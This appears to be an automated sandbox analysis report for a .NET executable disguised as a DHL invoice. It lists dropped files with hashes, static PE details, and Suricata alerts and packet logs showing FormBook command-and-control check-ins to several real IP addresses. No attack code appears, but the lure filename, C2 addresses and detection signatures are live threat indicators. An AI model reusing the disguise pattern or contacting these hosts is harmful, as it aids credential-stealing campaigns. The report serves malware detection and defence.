                                                                                Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.6.3.0.2.5.0.3.6.7.9.9.6.7.6.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.6.3.0.2.5.0.4.6.4.8.7.1.7.1.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.4.e.8.a.0.d.7.d.-.e.e.9.a.-.4.3.e.0.-.a.c.8.c.-.2.a.5.f.6.6.7.a.1.2.0.0.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.f.1.2.0.e.6.b.a.-.2.9.6.5.-.4.a.8.3.-.8.a.f.d.-.e.c.5.3.6.3.d.c.8.5.f.c.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.d.h.l.0.0.9.5.4.4.5.5.4.9.6.1...I.N.V...P.E.K...C.O...0.4.1...2.0.2.4.1.1.1.5...1.8.3.8.4.5...2.0.2.4.1.1.1.5...1.8.3.9.4.8...3.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.H.u.r.e.n.s.o.h.n...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.9.8.c.-.0.0.0.1.-.0.0.1.4.-.6.1.c.f.-.c.0.3.5.c.3.3.8.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.6.7.1.6.e.4.5.5.7.2.8.c.c.a.8.9.7.b.0.8.b.6.0.8.6.1.1.8.4.9.9.5.0.0.0.0.0.0.0.0.!.0.0.0.0.2.

                                                                                C:\ProgramData\Microsoft\Windows\WER\Temp\WER21A5.tmp.dmp

                                                                                Download File
                                                                                Process:C:\Windows\System32\WerFault.exe
                                                                                File Type:Mini DuMP crash report, 16 streams, Sun Nov 17 07:35:04 2024, 0x1205a4 type
                                                                                Category:dropped
                                                                                Size (bytes):570733
                                                                                Entropy (8bit):3.4507427103296475
                                                                                Encrypted:false
                                                                                SSDEEP:3072:jD/8OZFa3+vLHzM4aPsN3bajcSGCRkuOODF6+a1CCqhTyBmr6vUPk5yzUb6c3qF8:jlDa3QLYrI3bIGckJOUqh63qwNzs4
                                                                                MD5:C47D0EEB0C1FA3F3852EA6969E2CDC49
                                                                                SHA1:98BF281BA14656473B484BB54BFFC3D11E41E83C
                                                                                SHA-256:B1DEED657A96C20ACB61537FDB0C140558627126D9D609BFA913D79C58DACB82
                                                                                SHA-512:F4A864EE1BD5483E284F15BC0E638F49F6EE5C9303FA8A2863EA6C869E18F0F178748FE19186665401AD29100469040DF627B33FC1970DD349F1D755D755ED03
                                                                                Malicious:false
                                                                                Preview:MDMP..a..... .........9g......................... ..........$...t*......$"...*.......b.............l.......8...........T............A...s...........L...........N..............................................................................eJ......@O......Lw......................T.............9g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...........................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                C:\ProgramData\Microsoft\Windows\WER\Temp\WER23E8.tmp.WERInternalMetadata.xml

                                                                                Download File
                                                                                Process:C:\Windows\System32\WerFault.exe
                                                                                File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                Category:dropped
                                                                                Size (bytes):8774
                                                                                Entropy (8bit):3.7174219557175614
                                                                                Encrypted:false
                                                                                SSDEEP:192:R6l7wVeJMHHZ5Nr56Y9lPMHxPgmfZAcfpbFrpr789bl03f4Xm:R6lXJWZ5v6Y/PMHxPgmfacf6lUfV
                                                                                MD5:6BA8E2CDA2E3E8073DD23416E2985FAB
                                                                                SHA1:3C8392DAE5255D8B8720557E71145D551703C74B
                                                                                SHA-256:B84E7F277A66E402EAA3ACDA92033E39CE7620B22F1A8732A4B1A30BF68431D7
                                                                                SHA-512:98B903430E3DC847907FC6034D1FC748C419853182006FC928B554C5E41B09B34883755D4A3DEDF1F69C84F0F0253DAECBC5629C9ED0A94F1B70934BF2663031
                                                                                Malicious:false
                                                                                Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.5.4.0.<./.P.i.

                                                                                C:\ProgramData\Microsoft\Windows\WER\Temp\WER2427.tmp.xml

                                                                                Download File
                                                                                Process:C:\Windows\System32\WerFault.exe
                                                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                Category:dropped
                                                                                Size (bytes):5014
                                                                                Entropy (8bit):4.622317621267841
                                                                                Encrypted:false
                                                                                SSDEEP:48:cvIwWl8zsMJg771I9rYWpW8VYvYm8M4J1vLE6Fuiyq8vMLEKJz1Z1Md:uIjfKI7kR7VvJudiWzwJLMd
                                                                                MD5:E9E4302D72BDF0A7688D7376BD74BDAE
                                                                                SHA1:93BD033D929D4425A666629E52E8868E2D57ADF8
                                                                                SHA-256:D38E72F99C4EB85162E1C262D46EDBC548ADC9F7B2FE968F24A0FEEE2F16766D
                                                                                SHA-512:F43A7939807F98F6A3EE120C17EA9183E5A1CDCA5A7BEA616D3178F6DBE2F7EE1CB40D28B29A6D38BB88ACF21217BA8B934048BA922F186DAD40A425C5DBF256
                                                                                Malicious:false
                                                                                Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="591757" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                                                C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                Download File
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):64
                                                                                Entropy (8bit):1.1940658735648508
                                                                                Encrypted:false
                                                                                SSDEEP:3:NlllulJnp/p:NllU
                                                                                MD5:BC6DB77EB243BF62DC31267706650173
                                                                                SHA1:9E42FEFC2E92DE0DB2A2C9911C866320E41B30FF
                                                                                SHA-256:5B000939E436B6D314E3262887D8DB6E489A0DDF1E10E5D3D80F55AA25C9FC27
                                                                                SHA-512:91DC4935874ECA2A4C8DE303D83081FE945C590208BB844324D1E0C88068495E30AAE2321B3BA8A762BA08DAAEB75D9931522A47C5317766C27E6CE7D04BEEA9
                                                                                Malicious:false
                                                                                Preview:@...e.................................X..............@..........

                                                                                C:\Users\user\AppData\Local\Temp\2361o4QI

                                                                                Download File
                                                                                Process:C:\Windows\SysWOW64\wextract.exe
                                                                                File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                Category:dropped
                                                                                Size (bytes):114688
                                                                                Entropy (8bit):0.9746603542602881
                                                                                Encrypted:false
                                                                                SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                Malicious:false
                                                                                Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1ccrpgle.rnu.psm1

                                                                                Download File
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):60
                                                                                Entropy (8bit):4.038920595031593
                                                                                Encrypted:false
                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                Malicious:false
                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_34lazcny.4yx.psm1

                                                                                Download File
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):60
                                                                                Entropy (8bit):4.038920595031593
                                                                                Encrypted:false
                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                Malicious:false
                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ugrcbpth.rpx.ps1

                                                                                Download File
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):60
                                                                                Entropy (8bit):4.038920595031593
                                                                                Encrypted:false
                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                Malicious:false
                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_x3qagbox.th1.ps1

                                                                                Download File
                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                File Type:ASCII text, with no line terminators
                                                                                Category:dropped
                                                                                Size (bytes):60
                                                                                Entropy (8bit):4.038920595031593
                                                                                Encrypted:false
                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                Malicious:false
                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                C:\Windows\appcompat\Programs\Amcache.hve

                                                                                Download File
                                                                                Process:C:\Windows\System32\WerFault.exe
                                                                                File Type:MS Windows registry file, NT/2000 or above
                                                                                Category:dropped
                                                                                Size (bytes):1835008
                                                                                Entropy (8bit):4.466040577480646
                                                                                Encrypted:false
                                                                                SSDEEP:6144:xIXfpi67eLPU9skLmb0b4rWSPKaJG8nAgejZMMhA2gX4WABl0uNWdwBCswSbn:SXD94rWlLZMM6YFHc+n
                                                                                MD5:DE3ED05C1D85197ADC7308B720D9DF0C
                                                                                SHA1:6A1ABAE2CDE6F2196AE88EB89315FF577BF608D5
                                                                                SHA-256:5EB4D77483FF9C5BEFB49FE82306D5C80A4A4CDA068D4BFD626DCE52B5D0495D
                                                                                SHA-512:2261E937EAB70726B6D61AF58D527D5B2DBA97C80E36CD092B8C774D75A9CE085B96D8D3EFE5752B3B5F2A0F34413FDBABAA1735332D49C0459CA9CDC081594E
                                                                                Malicious:false
                                                                                Preview:regf6...6....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm.rU7.8................................................................................................................................................................................................................................................................................................................................................B.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                Static File Info

                                                                                General

                                                                                File type:PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
                                                                                Entropy (8bit):4.407550864019621
                                                                                TrID:
                                                                                • Win64 Executable GUI Net Framework (217006/5) 49.88%
                                                                                • Win64 Executable GUI (202006/5) 46.43%
                                                                                • Win64 Executable (generic) (12005/4) 2.76%
                                                                                • Generic Win/DOS Executable (2004/3) 0.46%
                                                                                • DOS Executable Generic (2002/1) 0.46%
                                                                                File name:dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exe
                                                                                File size:3'359'817 bytes
                                                                                MD5:0df139fa0f5d3a83ecff651fdd692c68
                                                                                SHA1:2c6e2af9e1602bc83e5c5919c75ad4aa120c0d1b
                                                                                SHA256:165f9bea48c75c958594f2d88cbe59d007f506cc49c4500dfcee93dedb6f8cac
                                                                                SHA512:5c22d2c7328f230be9a67c47559599e5b5f0d959fa3ff5c03795bca32414c695c0a7e38e2f56ce9ffc6362354de86b8e42943dbcba489df40d6dda2bfc8e5782
                                                                                SSDEEP:12288:c6rZU6UthuUujCCjLIrN9wUbJVaRZLZLCWGG8F8+5:xlUBuljC/N9waVAwF8+5
                                                                                TLSH:E4F522D135AB0E63FE6A60BAE6E6B4F554FC9D0B34F84E1FCF598C0558AA07C4616230
                                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d.....a..........."...0.4'............... ....@...... ....................................`................................

                                                                                File Icon

                                                                                Icon Hash:90cececece8e8eb0

                                                                                Static PE Info

                                                                                General

                                                                                Entrypoint:0x400000
                                                                                Entrypoint Section:
                                                                                Digitally signed:false
                                                                                Imagebase:0x400000
                                                                                Subsystem:windows gui
                                                                                Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                                DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                Time Stamp:0x916198D0 [Wed Apr 17 05:40:32 2047 UTC]
                                                                                TLS Callbacks:
                                                                                CLR (.Net) Version:
                                                                                OS Version Major:4
                                                                                OS Version Minor:0
                                                                                File Version Major:4
                                                                                File Version Minor:0
                                                                                Subsystem Version Major:4
                                                                                Subsystem Version Minor:0
                                                                                Import Hash:

                                                                                Entrypoint Preview

                                                                                Instruction
                                                                                dec ebp
                                                                                pop edx
                                                                                nop
                                                                                add byte ptr [ebx], al
                                                                                add byte ptr [eax], al
                                                                                add byte ptr [eax+eax], al
                                                                                add byte ptr [eax], al

                                                                                Data Directories

                                                                                NameVirtual AddressVirtual Size Is in Section
                                                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x60000x5a6.rsrc
                                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x47180x1c.text
                                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20000x48.text
                                                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                Sections

                                                                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                .text0x20000x27340x2800eb272c63c8ab696337af4ab5c9d53ebbFalse0.5525390625data5.779066063872368IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                .rsrc0x60000x5a60x6009a9b1eb281957316b1b1779ad352807fFalse0.4147135416666667data4.056084266397839IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                Resources

                                                                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                RT_VERSION0x60a00x31cdata0.4296482412060301
                                                                                RT_MANIFEST0x63bc0x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                                                                                Network Behavior

                                                                                Suricata IDS Alerts

                                                                                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                2024-11-17T08:35:54.803469+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.4497423.33.130.19080TCP
                                                                                2024-11-17T08:36:10.681399+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.44979264.225.91.7380TCP
                                                                                2024-11-17T08:36:13.243548+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.44980764.225.91.7380TCP
                                                                                2024-11-17T08:36:15.795679+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.44982264.225.91.7380TCP
                                                                                2024-11-17T08:36:18.451019+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.44983864.225.91.7380TCP
                                                                                2024-11-17T08:36:24.257088+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449869209.74.64.18780TCP
                                                                                2024-11-17T08:36:26.754764+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449884209.74.64.18780TCP
                                                                                2024-11-17T08:36:29.320780+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449900209.74.64.18780TCP
                                                                                2024-11-17T08:36:31.864264+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.449915209.74.64.18780TCP
                                                                                2024-11-17T08:36:45.687951+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449989162.0.215.3380TCP
                                                                                2024-11-17T08:36:48.234082+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450001162.0.215.3380TCP
                                                                                2024-11-17T08:36:50.826946+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450017162.0.215.3380TCP
                                                                                2024-11-17T08:36:53.370528+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.450020162.0.215.3380TCP
                                                                                2024-11-17T08:36:59.083627+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.4500213.33.130.19080TCP
                                                                                2024-11-17T08:37:01.830447+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.4500223.33.130.19080TCP
                                                                                2024-11-17T08:37:04.176598+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.4500233.33.130.19080TCP
                                                                                2024-11-17T08:37:06.722391+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.4500243.33.130.19080TCP
                                                                                2024-11-17T08:37:12.618902+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.45002598.124.224.1780TCP
                                                                                2024-11-17T08:37:15.155421+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.45002698.124.224.1780TCP
                                                                                2024-11-17T08:37:17.703737+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.45002798.124.224.1780TCP
                                                                                2024-11-17T08:37:20.466700+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.45002898.124.224.1780TCP
                                                                                2024-11-17T08:37:26.242161+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.45002967.223.117.16980TCP
                                                                                2024-11-17T08:37:28.797666+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.45003067.223.117.16980TCP
                                                                                2024-11-17T08:37:31.349528+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.45003167.223.117.16980TCP
                                                                                2024-11-17T08:37:33.867748+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.45003267.223.117.16980TCP
                                                                                2024-11-17T08:37:39.569655+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.4500333.33.130.19080TCP
                                                                                2024-11-17T08:37:42.107536+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.4500343.33.130.19080TCP
                                                                                2024-11-17T08:37:44.661726+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.4500353.33.130.19080TCP
                                                                                2024-11-17T08:37:48.046200+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.4500363.33.130.19080TCP
                                                                                2024-11-17T08:37:54.657728+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.4500373.33.130.19080TCP
                                                                                2024-11-17T08:37:56.327332+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.4500383.33.130.19080TCP
                                                                                2024-11-17T08:37:59.057631+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.4500393.33.130.19080TCP
                                                                                2024-11-17T08:38:01.586729+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.4500403.33.130.19080TCP
                                                                                2024-11-17T08:38:08.139589+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.4500413.33.130.19080TCP
                                                                                2024-11-17T08:38:09.809608+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.4500423.33.130.19080TCP
                                                                                2024-11-17T08:38:12.368620+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.4500433.33.130.19080TCP
                                                                                2024-11-17T08:38:14.915984+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.4500443.33.130.19080TCP
                                                                                2024-11-17T08:38:21.128979+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450045172.217.18.1980TCP
                                                                                2024-11-17T08:38:23.500997+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450046172.217.18.1980TCP
                                                                                2024-11-17T08:38:26.047633+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450047172.217.18.1980TCP
                                                                                2024-11-17T08:38:28.976984+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.450048172.217.18.1980TCP
                                                                                2024-11-17T08:38:34.901319+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.45004913.248.169.4880TCP
                                                                                2024-11-17T08:38:37.549598+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.45005013.248.169.4880TCP
                                                                                2024-11-17T08:38:40.010481+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.45005113.248.169.4880TCP
                                                                                2024-11-17T08:38:42.698493+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.45005213.248.169.4880TCP
                                                                                2024-11-17T08:38:49.249571+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.4500533.33.130.19080TCP
                                                                                2024-11-17T08:38:50.909685+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.4500543.33.130.19080TCP
                                                                                2024-11-17T08:38:53.573643+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.4500553.33.130.19080TCP
                                                                                2024-11-17T08:38:58.943682+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.4500563.33.130.19080TCP
                                                                                2024-11-17T08:39:05.537341+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.4500573.33.130.19080TCP
                                                                                2024-11-17T08:39:07.190058+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.4500583.33.130.19080TCP
                                                                                2024-11-17T08:39:10.044833+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.4500593.33.130.19080TCP

                                                                                Network Port Distribution

                                                                                TCP Packets

                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                Nov 17, 2024 08:35:53.837115049 CET4974280192.168.2.43.33.130.190
                                                                                Nov 17, 2024 08:35:53.842092991 CET80497423.33.130.190192.168.2.4
                                                                                Nov 17, 2024 08:35:53.842189074 CET4974280192.168.2.43.33.130.190
                                                                                Nov 17, 2024 08:35:53.848566055 CET4974280192.168.2.43.33.130.190
                                                                                Nov 17, 2024 08:35:53.853501081 CET80497423.33.130.190192.168.2.4
                                                                                Nov 17, 2024 08:35:54.802305937 CET80497423.33.130.190192.168.2.4
                                                                                Nov 17, 2024 08:35:54.803368092 CET80497423.33.130.190192.168.2.4
                                                                                Nov 17, 2024 08:35:54.803468943 CET4974280192.168.2.43.33.130.190
                                                                                Nov 17, 2024 08:35:54.805150986 CET4974280192.168.2.43.33.130.190
                                                                                Nov 17, 2024 08:35:54.810137987 CET80497423.33.130.190192.168.2.4
                                                                                Nov 17, 2024 08:36:09.952707052 CET4979280192.168.2.464.225.91.73
                                                                                Nov 17, 2024 08:36:09.957842112 CET804979264.225.91.73192.168.2.4
                                                                                Nov 17, 2024 08:36:09.958003044 CET4979280192.168.2.464.225.91.73
                                                                                Nov 17, 2024 08:36:09.973157883 CET4979280192.168.2.464.225.91.73
                                                                                Nov 17, 2024 08:36:09.978049994 CET804979264.225.91.73192.168.2.4
                                                                                Nov 17, 2024 08:36:10.638700962 CET804979264.225.91.73192.168.2.4
                                                                                Nov 17, 2024 08:36:10.681308985 CET804979264.225.91.73192.168.2.4
                                                                                Nov 17, 2024 08:36:10.681399107 CET4979280192.168.2.464.225.91.73
                                                                                Nov 17, 2024 08:36:11.483294964 CET4979280192.168.2.464.225.91.73
                                                                                Nov 17, 2024 08:36:12.501224995 CET4980780192.168.2.464.225.91.73
                                                                                Nov 17, 2024 08:36:12.506553888 CET804980764.225.91.73192.168.2.4
